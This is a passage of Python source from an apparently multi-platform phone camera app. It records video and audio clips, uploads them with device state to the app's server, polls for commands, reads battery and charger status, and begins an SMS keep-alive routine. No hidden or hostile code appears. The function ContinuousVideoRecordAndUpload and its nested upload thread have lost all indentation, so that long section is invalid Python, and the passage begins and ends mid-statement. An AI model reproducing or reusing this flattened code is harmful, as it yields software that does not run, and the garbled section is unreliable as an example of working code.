                                actualFileName[len(actualFileName) - 4:]
        except:
            DebugPrintErrorTrace()
    except:
        """
        Preserve the extension of the media file (by default it is a .3gp).
        # videoFileName = videoFileName[ : len(videoFileName) - 4] +
        #   actualFileName[len(actualFileName) - 4 : ]
        """
        DebugPrintErrorTrace()
    try:
        # Not sure if it requires backslashes
        videoPathFileName = videoPathFileName.replace("/", "\\")
        """
        We give this to allow saving completely the media file to the disk -
            but maybe it is not effective.
        """
        time.sleep(5.0)
    except:
        DebugPrintErrorTrace()
    return (videoFileName, videoPathFileName, actualFileName)
def VideoRecordAndUpload_Android(cameraId, recordDuration, \
                                 videoFileName, videoPathFileName):
    """Record a video on Android via the SL4A facade (myDroid) and leave it
    at videoPathFileName for the caller to upload.

    cameraId is currently not used to select a camera - see the TODO below.
    recordDuration - clip length in seconds.
    """
    try:
        """
        See https://code.google.com/p/android-scripting/wiki/ApiReference#recorderCaptureVideo:
            recorderCaptureVideo(String targetPath, Double duration[optional],
                Boolean recordAudio[optional, default true])
        """
        # myDroid.recorderCaptureVideo(videoPathFileName, recordDuration, True)
        # Hard-coded toggle between the two SL4A recording APIs; the
        # recorderStartVideo() path below is the one currently in use.
        #if True:
        if False:
            myDroid.recorderCaptureVideo(videoPathFileName, recordDuration,
                                         videoAudioEnabled)
        else:
            """
            #!!!!TODO: try out different resolutions with recorderStartVideo()
            From M:\1Hg5\android-scripting\android\Common\src\com\googlecode\android_scripting\facade\MediaRecorderFacade.java
                @Rpc(description = "Records video from the camera and saves it to the given location. "
                    + "\nDuration specifies the maximum duration of the recording session. "
                    + "\nIf duration is 0 this method will return and the recording will only be stopped "
                    + "\nwhen recorderStop is called or when a scripts exits. "
                    + "\nOtherwise it will block for the time period equal to the duration argument."
                    + "\nvideoSize: 0=160x120, 1=320x240, 2=352x288, 3=640x480, 4=800x480.")
                public void recorderStartVideo(@RpcParameter(name = "targetPath") String targetPath,
                    @RpcParameter(name = "duration") @RpcDefault("0") Integer duration,
                    @RpcParameter(name = "videoSize") @RpcDefault("1") Integer videoSize) throws Exception {
            """
            myDroid.recorderStartVideo(videoPathFileName, recordDuration, 3) # 640x480
            myDroid.recorderStop()
        # Wait for the video to be saved before trying to send the file.
        time.sleep(5.0)
    except:
        DebugPrintErrorTrace()
def VideoRecordAndUpload(cameraId, recordDuration):
    """Record one video clip with camera cameraId and upload it.

    recordDuration - clip length in seconds.
    Builds a timestamped file name, picks the local path depending on the
    platform and storeLocallyMedia, dispatches to the per-platform
    VideoRecordAndUpload_*() helper, uploads the file and finally deletes
    (or, on WinCE, moves) the local copy as configured.
    """
    global accessPointName #, bluetoothMode
    global LOCAL_FOLDER_MEDIA_FILES, deviceId
    DebugPrint("Entered VideoRecordAndUpload() at %s." % \
                GetCurrentDateTimeStringNice())
    # if SYMBIAN_OS:
    if SYMBIAN_S60_OS:
        VideoRecordAndUpload_S60_Before(cameraId)
    GetGSMLocation()
    # crtTime = GetCurrentDateTime()
    """
    See http://pleac.sourceforge.net/pleac_python/datesandtimes.html and
        http://docs.python.org/library/time.html#time.strftime for details.
    """
    #videoFileName = time.strftime("%Y_%m_%d_%H_%M_%S", crtTime) + \
    #                   ("_%d.3gp" % cameraId)
    videoFileName = GetCurrentDateTimeStringWithMilliseconds() + \
                        "_%s_%d.3gp" % (deviceId, cameraId)
    if storeLocallyMedia == 0:
        if ANDROID_OS:
            """
            Since we don't want to save the file on mem card, we save in
                the RAM drive.
            """
            videoPathFileName = "/sdcard/iCamTemp.3gp"
        elif SYMBIAN_OS:
            """
            Since we don't want to save the file on mem card, we save in
                the RAM drive.
            """
            # videoPathFileName = "D:/iCamTemp.3gp"
            videoPathFileName = LOCAL_FOLDER_TEMP + "/iCamTemp.3gp"
        elif WINDOWS_CE_OS_PYTHONCE:
            """
            We actually do not use this value, since we should have
                storeLocallyMedia == 1 (or 2).
            """
            videoPathFileName = "[N/A]"
    else:
        videoPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + videoFileName
    DebugPrint("VideoRecordAndUpload(%d) with videoFileName = %s, " \
                "videoPathFileName = %s, recordDuration = %d, " \
                "localVideoMode[cameraId] = %s. " % \
                (cameraId, videoFileName, videoPathFileName,
                 recordDuration, str(localVideoMode[cameraId])) + \
                GetTextForState(cameraId))
    # Dispatch to the platform-specific recorder; the WinCE helper also
    # rewrites the names it returns.
    if ANDROID_OS:
        VideoRecordAndUpload_Android(cameraId, recordDuration, \
                                     videoFileName, videoPathFileName)
    elif SYMBIAN_S60_OS:
        # elif SYMBIAN_OS:
        VideoRecordAndUpload_S60(cameraId, recordDuration, \
                                 videoFileName, videoPathFileName)
    elif WINDOWS_CE_OS_PYTHONCE:
        (videoFileName, videoPathFileName, actualFileName) = \
            VideoRecordAndUpload_WinCE( \
                cameraId, recordDuration, \
                videoFileName, videoPathFileName)
    """
    res = UploadStateAndFileAndStoreState(deviceId, cameraId,
            videoFileName, OUTPUT_VIDEO_PATH_FILENAME,
            ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE)
    """
    res = UploadStateAndFileAndStoreState(deviceId, cameraId,
            videoFileName, videoPathFileName,
            ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
            singleThreaded=False)
    #!!!!if res == -1: return
    if WINDOWS_CE_OS_PYTHONCE:
        try:
            if (storeLocallyMedia == 1) and (actualFileName is not None):
                DebugPrint("VideoRecordAndUpload(): Moving video in %s." % \
                            WINCE_SENT_MEDIA_FOLDER)
                if not os.path.exists(WINCE_SENT_MEDIA_FOLDER):
                    os.makedirs(WINCE_SENT_MEDIA_FOLDER)
                MoveFileBetweenAnyDrives(videoPathFileName, \
                    WINCE_SENT_MEDIA_FOLDER + "/" + actualFileName)
        except:
            DebugPrintErrorTrace()
    if storeLocallyMedia == 0:
        DebugPrint("VideoRecordAndUpload(): Since storeLocallyMedia == 0, " \
                    "now I erase it (note that on S60 I saved the movie " \
                    "on D:).")
        try:
            if SYMBIAN_OS:
                if _PyS60_1_9_OR_NEWER: #pyS60VersionNumber > 14:
                    # Wait until the upload thread is done with the file
                    # before deleting it.
                    mediaUploadedLock.wait()
            """
            If WINDOWS_CE_OS_PYTHONCE and (res == -1) we keep the video
                (normally in DCIM folder)
            """
            if (WINDOWS_CE_OS_PYTHONCE == False) or \
                ((WINDOWS_CE_OS_PYTHONCE == True) and (res != -1)):
                os.unlink(videoPathFileName)
            else:
                pass
        except OSError:
            """
            Quitting application since it might have problems with video
                recorder remaining hanged.
            """
            DebugPrint("VideoRecordAndUpload(): received exception of type " \
                        "exceptions.OSError.")
            DebugPrintErrorTrace()
            """
            At least my N95 with bad display gives sometimes this exception:
                "OSError: [Errno 13] Permission denied: 'D:/iCamTemp.3gp'"
            This exception started appearing immediately after an exception
                YouTubeError:
                {'status': 403, 'body': "<?xml version='1.0'
                encoding='UTF-8'?><errors><error><domain>yt:quota</domain><code>too_many_recent_calls</code></error></errors>", 'reason': 'Forbidden'}
                I guess this means the youtubeClient.InsertVideoEntry() doesn't
                    release this file, hence the exception when trying to
                    os.unlink() this file. Also it seems video recording
                    doesn't work either anymore (again probably because the
                    file D:/iCamTemp.3gp is still used by some thread? of
                    youtubeClient.InsertVideoEntry().
                LESS PROBABLE: I think it has to do with the fact the video
                    recording seems to have some issues (I have noticed this only
                    on this phone) - I think what happens is that the video
                    recorder remains hanged and doesn't release the file
                    'D:/iCamTemp.3gp', hence the exception when trying to
                    os.unlink() this file.
            """
        except:
            """
            A possible solution is to use a different name than
                D:/iCamTemp.3gp.:
            We don't give Quit(), because this exception can be triggered by
                the fact we want to upload the video to YouTube, but receive a
                timeout exception and save the movie to the Unsent folder,
                hence we don't have the file anymore as videoPathFileName.
            """
            DebugPrintErrorTrace()
# Presumably enables recording the next clip while the previous one is
# uploading (see the continuous/"burst" video mode notes below) - confirm
# against its uses elsewhere in the file.
MULTITHREADED_VIDEORECORD_AND_UPLOAD = True
"""
For Symbian OS:
VF, TakePhoto, VideoRec, AudioRec.
- NOTE: .save() and .resize() can be async
Burst (Turbo) VideoRecord mode:
- accomplished by:
keeping on forever the VF
uses multithreading to do video recording of new movie and sending
the previous movie simultaneously.
The standard VideoRecordAndUpload, which is useful if we use both
cameras, does the following:
# In case the power saver is started we leave a few seconds for
# S60 to come back to landscape orientation - sometimes it
# takes longer.
e32.ao_sleep(3)
StartViewFinderForCamera
camera.stop_finder()
camera.release()
#camera._my_camera = camera._camera.Camera(cameraId)
camera.UseCamera(cameraId)
# We have to make sure (for ex on Nokia 6120) that the viewfinder
# is started if we want to get visual info in the video recorded.
e32.ao_sleep(2)
# This operation takes time: it finishes the compression and saves
# the data on card.
stop_record()
1 sec pause
    As we can see we pause for 6 seconds explicitly (which are MANDATORY
TO USE TO PERFORM VIDEO RECORDING in the right orientation, etc),
and most likely 1-4 more in StartViewFinderForCamera and
stop_record().
So, in case we don't use both cameras, we should use
ContinuousVideoRecordAndUpload() since it is more efficient - fewer
operations which probably result in less mechanical stress on the
        shutter and the rest of the optical system.
"""
def ContinuousVideoRecordAndUpload(cameraId, recordDuration):
global accessPointName #, bluetoothMode
global deviceId, viewFinderSize, videoLock
global LOCAL_FOLDER_MEDIA_FILES, LOCAL_FOLDER_UNSENT_FILES
global uploadUnsentData
uploadUnsentData = 0
"""
We save the unsent packet in the ram drive.
In fact we should not even save the Unsent packets -simply drop them maybe.
"""
# LOCAL_FOLDER_UNSENT_FILES = "D:/Unsent"
LOCAL_FOLDER_UNSENT_FILES = LOCAL_FOLDER_TEMP + "/Unsent"
if not os.path.exists(LOCAL_FOLDER_UNSENT_FILES):
os.makedirs(LOCAL_FOLDER_UNSENT_FILES)
DebugPrint("Entered ContinuousVideoRecordAndUpload() at %s." % \
GetCurrentDateTimeStringNice())
if SYMBIAN_OS:
if orientationForThisPhoneModel == "landscape":
#if phoneModel in ["Nokia6120", "NokiaN95", "NokiaN82"]:
isBackLightOn = True
else:
isBackLightOn = False
"""
We have observed on "landscape"-mode-phones that the screen saver
(which is INVARIABLY in Portrait mode) can mess up the video
recordings making them rotated (as in Portrait mode). This is why
we give e32.reset_inactivity() and also e32.ao_sleep(2), to make
sure we are in landscape mode before the viewfinder starts (which
is used by the recording).
"""
try:
e32.reset_inactivity()
"""
In case the power saver is started we leave a few seconds for S60
to come back to landscape orientation - sometimes it takes
longer.
"""
e32.ao_sleep(3)
"""
if (cameraId == 0) and camera2IsImported:
# IMPORTANT: AT THE END OF THE RECORD WE MAKE
# viewFinderSize = VIEWFINDER_SIZE_ORIG - SEE BELOW, I
# FINALLY.
viewFinderSize = (320, 240) #(293, 240)
else:
# IMPORTANT: AT THE END OF THE RECORD WE MAKE
# viewFinderSize = VIEWFINDER_SIZE_ORIG - SEE BELOW, IN
# FINALLY.
viewFinderSize = (176, 144) #(293, 240)
"""
SetViewFinderSizeForVideoRecording(cameraId)
# StartViewFinderForCamera(cameraId, isBackLightOn, True)
StartViewFinderForCamera(cameraId, isBackLightOn, False)
e32.reset_inactivity()
# When iCam is not the main app, video recs are rotated.
#e32.ao_sleep(3)
# Generated 1 rotated out of 16.
# e32.ao_sleep(2)
e32.ao_yield()
# e32.ao_sleep(4)
# e32.ao_sleep(5)
"""
We have to make sure (for ex on Nokia 6120) that the viewfinder is
started if we want to get visual info in the video recorded.
"""
e32.ao_sleep(2)
e32.reset_inactivity()
except:
DebugPrintErrorTrace()
GetGSMLocation()
# Nokia N82
if deviceId == IMEI_N82:
"""
LOCAL_FOLDER_AUX = "D:/iCam"
if os.path.exists(LOCAL_FOLDER_AUX) == False:
os.makedirs(LOCAL_FOLDER_AUX)
"""
LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER_TEMP + "/Media"
if not os.path.exists(LOCAL_FOLDER_MEDIA_FILES):
os.makedirs(LOCAL_FOLDER_MEDIA_FILES)
counterVideoRecords = 0
while True:
NUM_VIDEO_RECORDS_BETWEEN_DOWNLOAD_COMMANDS = 2
if counterVideoRecords == 0:
hasDownloadedNewCmd = DownloadCommands()
if counterVideoRecords \
== NUM_VIDEO_RECORDS_BETWEEN_DOWNLOAD_COMMANDS - 1:
counterVideoRecords = 0
else:
counterVideoRecords += 1
#crtTime = GetCurrentDateTime()
"""
See http://pleac.sourceforge.net/pleac_python/datesandtimes.html
and http://docs.python.org/library/time.html#time.strftime
for details.
"""
#videoFileName = time.strftime("%Y_%m_%d_%H_%M_%S", crtTime) + \
# ("_%d.3gp" % cameraId)
videoFileName = GetCurrentDateTimeStringWithMilliseconds() + \
"_%s_%d.3gp" % (deviceId, cameraId)
#+ "_%d.3gp" % cameraId
if storeLocallyMedia == 0:
# Since we don't want to save the file on mem card, we save in
# the RAM drive.
#videoPathFileName = "D:/iCamTemp.3gp"
# Since we don't want to save the file on mem card, we save in
# the RAM drive.
videoPathFileName = LOCAL_FOLDER_TEMP + "/iCamTemp.3gp"
else:
videoPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + \
videoFileName
DebugPrint("ContinuousVideoRecordAndUpload(%d) with " \
"videoFileName = %s, videoPathFileName = %s, " \
"recordDuration = %d, localVideoMode[cameraId] = %s. " % \
(cameraId, videoFileName, videoPathFileName,
recordDuration, str(localVideoMode[cameraId])) + \
GetTextForState(cameraId))
#sys.stdout.flush()
try:
"""
Requires backslashes, otherwise camera.start_record() does
not create any file.
"""
videoPathFileNameWithBackslashes = \
videoPathFileName.replace("/", "\\")
if (cameraId == 0) and camera2IsImported:
"""
#camera.start_record(videoPathFileNameWithBackslashes,
# VideoRecordCallback,
# size = localVideoMode[cameraId][0])
# #size = (320, 240))
#camera.start_record(videoPathFileNameWithBackslashes,
# VideoRecordCallback, format = "YUV420p",
# frameSize = localVideoMode[cameraId][0],
# frameRate = 15.0, videoType = "",
# audioEnabled = videoAudioEnabled)
#camera.start_record(videoPathFileNameWithBackslashes,
# VideoRecordCallback, size = (640, 480)) #, fps = 15.0)
#camera.start_record(videoPathFileNameWithBackslashes,
# VideoRecordCallback, format = "YUV420p",
# frameSize = localVideoMode[cameraId][0],
# frameRate = localVideoMode[cameraId][1],
# videoType = "", audioEnabled = videoAudioEnabled)
"""
camera.start_record(
videoPathFileNameWithBackslashes,
VideoRecordCallback,
format="EFormatYUV420Planar",
frameSize=localVideoMode[cameraId][0],
frameRate=localVideoMode[cameraId][1],
videoType="video/mp4v-es; profile-level-id=4",
audioEnabled=videoAudioEnabled
)
else:
camera.start_record(videoPathFileNameWithBackslashes,
VideoRecordCallback)
#myResult=camera.start_record(videoPathFileNameWithBackslashes,
# VideoRecordCallback, size=(320, 240)) #it returns !!!!
"""
Preparing for video record might take, in some cases, even
seconds, so we wait for notification, it is ready:
"""
videoLock.wait()
e32.ao_sleep(recordDuration)
"""
If I use after it might give strange results - can record for
much longer than wanted (e.g., 1:30 min instead of 15
secs) - is it maybe because of the petting that writes a
file on D: ?
"""
# SleepAndPetWatchdog(recordDuration)
# global myTimer
# myTimer.after(recordDuration, camera.stop_record)
DebugPrint("ContinuousVideoRecordAndUpload(): before " \
"camera.stop_record(), " \
"GetCurrentDateTimeStringWithMilliseconds() = %s." % \
GetCurrentDateTimeStringWithMilliseconds())
"""
This operation takes time: it finishes the compression and
saves the data on card.
"""
camera.stop_record()
DebugPrint("ContinuousVideoRecordAndUpload(): after " \
"camera.stop_record(), " \
"GetCurrentDateTimeStringWithMilliseconds() = %s." % \
GetCurrentDateTimeStringWithMilliseconds())
"""
camera.stop_record()
camera.stop_finder()
"""
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
"""
UploadGZippedData(deviceId, "Exception in " \
"VideoRecordAndUpload(%d) with videoFileName = %s: " \
"details: free_ram = %d. %s.\n" \
% (cameraId, videoFileName, GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)) ),
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
"""
# traceback.print_exc()
errorStr = "ContinuousVideoRecordAndUpload(%d) with " \
"videoFileName %s (free_ram = %d) returned " \
"exception %s. Bailing out..." % \
(cameraId, videoFileName, GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)))
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, errorStr,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(errorStr)
if MY_DEBUG_STDERR:
sys.stderr.write(" " + errorStr + "\n")
DebugPrintErrorTrace()
viewFinderSize = VIEWFINDER_SIZE_ORIG
"""
Even if we give return, finally is sill executed before
returning from this function.
"""
return
"""
# !!!!This finally doesn't work on PyS60 1.4.5 (Python 2.2) - WHY?
finally:
viewFinderSize = VIEWFINDER_SIZE_ORIG
"""
viewFinderSize = VIEWFINDER_SIZE_ORIG
# if accessPointName == u"":
# print "VideoRecordAndUpload(): Not uploading movie."
# return
def UploadThread(videoFileName, videoPathFileName):
"""
http://stackoverflow.com/questions/2576534/does-pythons-httplib-httpconnection-block
"Although you can do asynchronous requests, you will have to
make you entire program async-friendly. Async does not
magically make your code non-blocking. It would be much
easier to do the request in another thread or process if
you don't want to block your main loop."
"""
"""
We sleep to give time to the phone to complete saving the
video file.
It would be nice to use instead of sleep() a lock and signal
in VideoRecordCallback when it receives
camera.ERecordComplete, but ERecordComplete is not issued
by camera.stop_record().
"""
e32.ao_sleep(2)
"""
try:
camera.stop_finder()
DebugPrint("VideoRecordAndUpload(): after " \
"camera.stop_finder(), " \
"GetCurrentDateTimeStringWithMilliseconds() = %s." % \
GetCurrentDateTimeStringWithMilliseconds())
except:
DebugPrintErrorTrace()
sys.stdout.flush()
"""
UploadStateAndFileAndStoreState(deviceId, cameraId,
videoFileName, videoPathFileName,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
singleThreaded=True)
global MULTITHREADED_VIDEORECORD_AND_UPLOAD
if MULTITHREADED_VIDEORECORD_AND_UPLOAD:
"""
Multithreaded version --> it tries to film as much as possible,
with very little pause between films, since we use a
separate thread for video upload.
"""
"""
thread.start_new_thread(UploadThread, (videoFileName,
videoPathFileName))
"""
MyThreadStart(UploadThread, (videoFileName, videoPathFileName))
else:
# Single-threaded version.
res = UploadStateAndFileAndStoreState(deviceId, cameraId,
videoFileName, videoPathFileName,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
singleThreaded=True
)
if not MULTITHREADED_VIDEORECORD_AND_UPLOAD:
if storeLocallyMedia == 0:
DebugPrint("ContinuousVideoRecordAndUpload(): Since " \
"storeLocallyMedia == 0, I saved the movie on " \
"D: and now I erase it.")
try:
os.unlink(videoPathFileName)
except:
DebugPrintErrorTrace()
"""
When getting out of the Burst mode - which I should do, instead of
having a FOREVER loop.
"""
global videoRecordStartTime
videoRecordStartTime = -1
def AudioRecordAndUpload(recordDuration):
    """Record `recordDuration` seconds of audio and upload the .amr file.

    The clip is written either to the RAM drive (when storeLocallyMedia ==
    0, to spare the memory card) or to the media folder, recorded via the
    Symbian `audio` API, then uploaded together with the device state.
    The pseudo camera id 2 conventionally tags audio captures. When the
    file was only a RAM-drive temporary it is deleted after the upload.

    NOTE(review): on non-Symbian platforms nothing is recorded but the
    upload is still attempted (presumably on a stale/missing file) -
    confirm that is intended.
    """
    global LOCAL_FOLDER_MEDIA_FILES, accessPointName, deviceId
    """
    !!!!TODO: use pyjnius example ex_audio_rec.py
    from jnius import autoclass
    from time import sleep
    # get the needed Java class
    MediaRecorder = autoclass('android.media.MediaRecorder')
    AudioSource = autoclass('android.media.MediaRecorder$AudioSource')
    OutputFormat = autoclass('android.media.MediaRecorder$OutputFormat')
    AudioEncoder = autoclass('android.media.MediaRecorder$AudioEncoder')
    # create out recorder
    mRecorder = MediaRecorder()
    mRecorder.setAudioSource(AudioSource.MIC)
    mRecorder.setOutputFormat(OutputFormat.THREE_GPP)
    mRecorder.setOutputFile('/sdcard/testrecorder.3gp')
    #Alex: this was wrong
    #mRecorder.setAudioEncoder(AudioEncoder.ARM_NB)
    mRecorder.setAudioEncoder(AudioEncoder.ARM_NB)
    mRecorder.prepare()
    # record 5 seconds
    mRecorder.start()
    sleep(5)
    mRecorder.stop()
    mRecorder.release()
    if ANDROID_OS:
        recorderStartMicrophone
        recorderStop
    """
    # crtTime = GetCurrentDateTime()
    """
    See http://pleac.sourceforge.net/pleac_python/datesandtimes.html and
    http://docs.python.org/library/time.html#time.strftime for details.
    """
    # audioFileName = time.strftime("%Y_%m_%d_%H_%M_%S.amr", crtTime)
    # Timestamped, device-tagged file name; "camera" id 2 marks audio.
    audioFileName = GetCurrentDateTimeStringWithMilliseconds() + \
        "_%s_%d.amr" % (deviceId, 2) # We make cameraId = 2
    if storeLocallyMedia == 0:
        # Since we don't want to store the file, we save in the RAM drive.
        # audioPathFileName = "D:/iCamTemp.amr"
        audioPathFileName = LOCAL_FOLDER_TEMP + "/iCamTemp.amr"
    else:
        audioPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + \
            audioFileName
    DebugPrint("AudioRecordAndUpload() with audioFileName = %s and " \
        "recordDuration = %d. " % (audioFileName, recordDuration) + \
        GetTextForState(0))
    if SYMBIAN_OS:
        try:
            """
            Requires backslashes, otherwise audio.Sound.open() PROBABLY does
            not create any file.
            """
            audioPathFileNameWithBackslashes = \
                audioPathFileName.replace("/", "\\")
            mySound = audio.Sound.open(audioPathFileNameWithBackslashes)
            mySound.record()
            # Sleep for the requested duration while keeping the hardware
            # watchdog fed, then stop the recording.
            SleepAndPetWatchdog(recordDuration, False)
            # e32.ao_sleep(recordDuration)
            mySound.stop()
        except:
            (exceptionType, exceptionValue, exceptionTraceback)= sys.exc_info()
            errorStr = "AudioRecordAndUpload() with audioFileName %s " \
                "(free_ram = %d) returned exception %s. " \
                "Bailing out..." % \
                (audioFileName, GetFreeRAM(),
                repr(traceback.format_tb(exceptionTraceback)))
            if MY_DEBUG_UPLOAD_MSG:
                UploadGZippedData(deviceId, errorStr, ICAM_SERVER_NAME,
                    WEBPAGE_UL_GZIPPED_TEXT, None)
            DebugPrint(errorStr)
            if MY_DEBUG_STDERR:
                sys.stderr.write(" " + errorStr + "\n")
            DebugPrintErrorTrace()
            return
    # if accessPointName == u"":
    #     print "AudioRecordAndUpload(): Not uploading movie."
    #     sys.stdout.flush()
    #     return
    res = UploadStateAndFileAndStoreState(
        deviceId, 2, # We make cameraId = 2
        audioFileName, audioPathFileName,
        ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
        singleThreaded=True
    )
    if storeLocallyMedia == 0:
        DebugPrint("Since storeLocallyMedia == 0, I saved the audio file " \
            "on D: and now I erase it.")
        try:
            """
            if SYMBIAN_OS:
                if _PyS60_1_9_OR_NEWER: #pyS60VersionNumber > 14:
                    mediaUploadedLock.wait()
            """
            os.unlink(audioPathFileName)
        except:
            DebugPrintErrorTrace()
def GetBatteryLevelPercentage():
    """Return the battery charge level as an int percentage (0-100).

    Platform matrix:
      - Android: dumps the SL4A battery facade values to the debug log and
        reports 100 (the facade results are not decoded yet - TODO).
      - Symbian S60 3rd+ ed.: sysinfo.battery() already returns a percent.
      - Symbian S60 2nd ed.: sysinfo.battery() returns 0..7 bars; scaled.
      - Every other platform: no battery API is used, 100 is reported.

    Robustness fix: previously an exception (or an unmatched S60 edition)
    fell off the end and returned None; the function now always returns
    an int, defaulting to 100.
    """
    try:
        if ANDROID_OS:
            # See http://www.mithril.com.au/android/doc/BatteryManagerFacade.html
            try:
                # Log every facade value for diagnostics; none of them is
                # (yet) propagated to the caller.
                DebugPrint(
                    "GetBatteryLevelPercentage(): %s" % \
                    str(myDroid.batteryGetLevel()))
                DebugPrint(
                    "    %s" % \
                    str(myDroid.batteryCheckPresent()))
                DebugPrint(
                    "    %s" % \
                    str(myDroid.batteryGetHealth()))
                DebugPrint(
                    "    %s" % \
                    str(myDroid.batteryGetPlugType()))
                DebugPrint(
                    "    %s" % \
                    str(myDroid.batteryGetStatus()))
                DebugPrint(
                    "    %s" % \
                    str(myDroid.batteryGetTechnology()))
                DebugPrint(
                    "    %s" % \
                    str(myDroid.batteryGetTemperature()))
                DebugPrint(
                    "    %s" % \
                    str(myDroid.batteryGetVoltage()))
                DebugPrint(
                    "    %s" % \
                    str(myDroid.readBatteryData()))
            except:
                DebugPrintErrorTrace()
                return 100
            return 100
        elif SYMBIAN_S60_OS:
            if S60_EDITION[0] >= 3:
                # S60 3rd+ edition reports the percentage directly.
                return int(sysinfo.battery())
            elif SYMBIAN_S60_2ND_ED:
                # On S60 2nd edition the max is 7 bars - see
                # http://discussion.forum.nokia.com/forum/showthread.php?97900-Is-there-a-way-to-show-battery-level-in-a-scale-from-0-to-99-instead-7preset-values
                return int(sysinfo.battery() * 100.0 / 7.0)
        elif SYMBIAN_UIQ_OS:
            return 100
        elif iOS_PYOBJC:
            return 100
        elif WINDOWS_OS:
            return 100
        elif UNIX_OS:
            return 100
        elif WINDOWS_CE_OS_PYTHONCE:
            return 100
        elif RASPBIAN_OS:
            return 100
    except:
        DebugPrintErrorTrace()
    # Fallback (error, unknown platform or unmatched S60 edition): report a
    # full battery instead of returning None.
    return 100
def GetChargerStatusStr():
    """Return a short human-readable charger status string.

    On Symbian S60 the numeric sysagent.charger_status() code is mapped
    to text (see the EChargingStatus* enum below); on Android the raw
    SL4A status is stringified; everywhere else - or on any error or
    unknown code - "[N/A]" is returned.

    Fixes: UNIX_OS/RASPBIAN_OS (which GetChargerStatus() handles) and
    unmapped status codes previously fell through and returned None;
    every path now returns a string.
    """
    global sysagentImported
    if ANDROID_OS:
        #print "myDroid.batteryGetStatus() =", myDroid.batteryGetStatus()
        #return int(myDroid.batteryGetStatus().result)
        return str(myDroid.batteryGetStatus())
    elif SYMBIAN_S60_OS:
        if sysagentImported:
            try:
                """
                EChargingStatusError = -1,
                /// Charger not connected/uninitialized
                EChargingStatusNotConnected = 0,
                /// Device is charging
                EChargingStatusCharging = 1,
                /// Charger is connected, device not charging
                EChargingStatusNotCharging = 2,
                /// Charging almost completed
                EChargingStatusAlmostComplete = 3,
                /// Charging completed
                EChargingStatusChargingComplete = 4,
                /// Charging continued after brief interruption
                EChargingStatusChargingContinued = 5
                """
                statusText = {
                    -1: "error",
                    0: "not connected",
                    1: "charging",
                    2: "not charging",
                    3: "almost done",
                    4: "charging done",
                    5: "charging cont'd",
                }
                return statusText.get(int(sysagent.charger_status()),
                    "[N/A]")
            except:
                DebugPrintErrorTrace()
                return "[N/A]"
    # Every other platform (UIQ, iOS, Windows, WinCE, Unix, Raspbian, ...)
    # and the no-sysagent case: charger status is not available.
    return "[N/A]"
def GetChargerStatus():
    """Return the charger status as an int.

    Android: logs myDroid.batteryGetStatus() and returns 1 ("charging";
    the facade result is not decoded yet - TODO).
    Symbian (with sysagent): returns the raw EChargingStatus* code:
        -1 error, 0 not connected, 1 charging, 2 connected-not-charging,
        3 almost complete, 4 complete, 5 continued after interruption.
    Everywhere else, or on any error: 1 ("assume charging").

    Fix: an unrecognized platform previously fell off the end and
    returned None; the function now always returns an int.
    """
    global deviceId, sysagentImported
    if ANDROID_OS:
        # print "myDroid.batteryGetStatus() =", myDroid.batteryGetStatus()
        try:
            DebugPrint(
                "GetChargerStatus(): %s" % \
                str(myDroid.batteryGetStatus()))
        except:
            DebugPrintErrorTrace()
            return 1
        return 1
    elif SYMBIAN_OS:
        if sysagentImported:
            try:
                """
                EChargingStatusError = -1,
                /// Charger not connected/uninitialized
                EChargingStatusNotConnected = 0,
                /// Device is charging
                EChargingStatusCharging = 1,
                /// Charger is connected, device not charging
                EChargingStatusNotCharging = 2,
                /// Charging almost completed
                EChargingStatusAlmostComplete = 3,
                /// Charging completed
                EChargingStatusChargingComplete = 4,
                /// Charging continued after brief interruption
                EChargingStatusChargingContinued = 5
                """
                # Return the raw EChargingStatus* code (see docstring).
                return int(sysagent.charger_status())
            except:
                DebugPrintErrorTrace()
                return 1
    # No sysagent, or any other platform (iOS, Windows, Unix, WinCE,
    # Raspbian, unknown): report "charging" as the safe default.
    return 1
def CallbackSMSSend(smsSendState):
    """Callback handed to messaging.sms_send(): log the send outcome.

    Only the terminal states (sent / failed) are reported; intermediate
    states are ignored. Any error while logging is swallowed and traced,
    since a callback must never raise into the messaging stack.
    """
    try:
        if smsSendState == messaging.ESent:
            outcome = "Message was sent."
        elif smsSendState == messaging.ESendFailed:
            outcome = "Something went wrong while sending."
        else:
            return
        DebugPrint(
            "CallbackSMSSend(smsSendState = %d): " % smsSendState + outcome)
    except:
        DebugPrintErrorTrace()
# TODO!!!! Read it from state.bin
# Timestamp of the last keep-alive SMS sent to the operator (see
# CommunicateWithOperator()); 0 means "never sent this run", so the
# first call always sends.
lastTimeSentMessage = 0
def CommunicateWithOperator():
    """Send a periodic keep-alive SMS to the telecom operator.

    At most one SMS per MAX_TIME_BETWEEN_SEND_MESSAGES (1 day) is sent.
    Any failure is logged and swallowed - the caller's loop must not die
    because messaging is unavailable.

    Bug fix: lastTimeSentMessage used to be assigned GetCurrentDateTime()
    (a time tuple, cf. its strftime use elsewhere in this file) while the
    guard computes `GetTime() - lastTimeSentMessage` on numeric seconds -
    so after the first send every later call raised TypeError, which was
    silently swallowed, breaking the throttle. We now store GetTime().
    """
    global lastTimeSentMessage
    DebugPrint("Entered CommunicateWithOperator().")
    # MAX_TIME_BETWEEN_SEND_MESSAGES = 30 * 24 * 3600 # 30 days in seconds
    MAX_TIME_BETWEEN_SEND_MESSAGES = 1 * 24 * 3600 # 1 day in seconds
    try:
        if GetTime() - lastTimeSentMessage > MAX_TIME_BETWEEN_SEND_MESSAGES:
            DebugPrint("CommunicateWithOperator(): Sending SMS.")
            # This returns only if the SMS was sent successfully - the
            # application sometimes gets blocked at .sms_send().
